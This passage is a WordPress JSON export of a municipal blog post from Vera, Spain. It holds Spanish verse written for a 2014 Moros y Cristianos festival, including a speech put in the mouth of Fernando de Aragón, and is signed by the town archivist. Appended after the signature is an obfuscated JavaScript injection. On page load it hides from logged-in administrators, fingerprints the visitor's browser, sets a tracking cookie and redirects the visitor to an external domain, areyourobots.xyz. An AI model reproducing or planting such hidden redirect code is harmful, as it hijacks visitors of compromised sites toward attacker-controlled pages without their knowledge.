Cuevas.<\/span><\/p>\n<p><span style=\"font-size: small\">Se manda a Juan Benavides, capit\u00e1n de la frontera.<\/span><\/p>\n<p><span style=\"font-size: small\">Moj\u00e1car ser\u00e1 el d\u00eda doce. Capitul\u00f3 la tierra de Vera.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y en El Real recibe a todos: lugares del Almanzora,<\/span><\/p>\n<p><span style=\"font-size: small\">Filabres, Los V\u00e9lez, N\u00edjar; Hu\u00e9scar, Orce y Galera.<\/span><\/p>\n<p><span style=\"font-size: small\">Doce d\u00edas acampados, aceptando se rindieran.<\/span><\/p>\n<p><span style=\"font-size: small\">Es claro el juicio de Dios: jam\u00e1s ser\u00e1 tierra mora.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Viendo salir del castillo, a la gente musulmana, <\/span><\/p>\n<p><span style=\"font-size: small\">les habl\u00f3 en buena hora, a todos los que all\u00ed hab\u00eda.<\/span><\/p>\n<p><span style=\"font-size: small\">Despu\u00e9s de mandar construir, foso y empalizada,<\/span><\/p>\n<p><span style=\"font-size: small\">creemos que dijo as\u00ed, antes de marchar a Almer\u00eda:<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\"><b>[<span style=\"text-decoration: underline\">DISCURSO DE FERNANDO DE ARAG\u00d3N<\/span>]:<\/b><\/span><\/p>\n<p><span style=\"font-size: small\">Mis nobles caballeros, soldados y homes buenos.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Deseamos para Nos, m\u00e1s all\u00e1 la mirada alcance.<\/span><\/p>\n<p><span style=\"font-size: small\">Los siglos por llegar, contar\u00e1n la vera historia,<\/span><\/p>\n<p><span style=\"font-size: small\">que bien me serv\u00edsteis, en el ingrato y duro trance<\/span><\/p>\n<p><span style=\"font-size: small\">de legar a nuestros hijos lo anhelado. La victoria.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Espero que ma\u00f1ana, los triunfos el tiempo guarde,<\/span><\/p>\n<p><span style=\"font-size: small\">los buenos en Granada entren conmigo en la gloria.<\/span><\/p>\n<p><span style=\"font-size: small\">Y aunque seguro ser\u00e1, que la muerte nos separe,<\/span><\/p>\n<p><span style=\"font-size: small\">qui\u00e9rolos a todos nombrar. Dios atienda y me oiga.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Aqu\u00ed los adelantados, de Andaluc\u00eda, Murcia y Castilla:<\/span><\/p>\n<p><span style=\"font-size: small\">Enr\u00edquez, don Juan Chac\u00f3n y Pero L\u00f3pez de Padilla.<\/span><\/p>\n<p><span style=\"font-size: small\">Alcaides, almirantes, de las cuatro \u00f3rdenes maestres:<\/span><\/p>\n<p><span style=\"font-size: small\">Santiago, Montesa, Alc\u00e1ntara; Calatrava, de Gand\u00eda,<\/span><\/p>\n<p><span style=\"font-size: small\">y de N\u00e1jera, duque de Alba, de Toledo, de Alburquerque.<\/span><\/p>\n<p><span style=\"font-size: small\">Buen Rodrigo, de Cabrera, de Villena. Los marqueses.<\/span><\/p>\n<p><span style=\"font-size: small\">Muchos condes: Cabra, Ure\u00f1a, Benavente, de Buend\u00eda,<\/span><\/p>\n<p><span style=\"font-size: small\">de Ledesma, Monteagudo, de Castro y de Cifuentes.<\/span><\/p>\n<p><span style=\"font-size: small\">Aquel de Trigento, Oropesa, de Concentaina y Oliva.<\/span><\/p>\n<p><span style=\"font-size: small\">Se\u00f1or de Castroquemado, Palma, arzobispo de Sevilla. <\/span><\/p>\n<p><span style=\"font-size: small\">De Baza, de armas y letras, don Fernando de Ribera,<\/span><\/p>\n<p><span style=\"font-size: small\">y el nombrado por m\u00ed su Alcalde: Garcilasso de la Vega.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Y a vosotros, nuevos s\u00fabditos, rodillas deis en la tierra<\/span><\/p>\n<p><span style=\"font-size: small\">y rezad a vuestro Dios, sin temer las represalias.<\/span><\/p>\n<p><span style=\"font-size: small\">Somos reyes bondadosos; la algarab\u00eda es vuestra lengua.<\/span><\/p>\n<p><span style=\"font-size: small\">Justicia, bien com\u00fan, paz, tal convivencia traiga.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\">Repartimiento haremos, a los que vengan a poblarla.<\/span><\/p>\n<p><span style=\"font-size: small\">La Vera capitulada profundas ra\u00edces tenga.<\/span><\/p>\n<p><span style=\"font-size: small\">Acudan colonos valientes, tengan su tierra y su agua.<\/span><\/p>\n<p><span style=\"font-size: small\">Aqu\u00ed termina el medievo: ser\u00e1 tierra realenga.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: small\"><span style=\"text-decoration: underline\"><b>[RODRIGO PONCE DE LE\u00d3N. MARQU\u00c9S DE C\u00c1DIZ]:<\/b><\/span><\/span><\/p>\n<p><span style=\"font-size: small\">\u00a1Por Cristo! (el p\u00fablico: \u00a1por Cristo!)<\/span><\/p>\n<p><span style=\"font-size: small\">\u00a1Viva Arag\u00f3n y Castilla! (el p\u00fablico: \u00a1viva!)<\/span><\/p>\n<p><span style=\"font-size: small\">\u00a1Viva el Rey y la Reina! (el p\u00fablico: \u00a1viva!)<\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Vera, 13-05-14<\/p>\n<p>Manuel Caparr\u00f3s Perales<\/p>\n<p>Archivero Municipal de Vera<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Un grupo de veratenses se propuso no hace muchos meses volver a\u00a0organizar la fiesta de moros y cristianos y retomar la que se celebraba en el siglo XVI en este mismo Municipio, tal y\u00a0como algunos historiadores han dado a conocer bas\u00e1ndose en documentos de la \u00e9poca. Se pretende rememorar agradecidos y con naturalidad,\u00a0promoviendo la convivencia, &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2014\/05\/15\/moros-y-cristianos-de-vera-textos\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">MOROS Y CRISTIANOS DE VERA 2014. TEXTOS<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":406,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105],"tags":[19],"class_list":["post-405","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actividades","tag-pregon"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/405","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=405"}],"version-history":[{"count":18,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/405\/revisions"}],"predecessor-version":[{"id":1031,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/405\/revisions\/1031"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/406"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=405"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=405"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=405"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}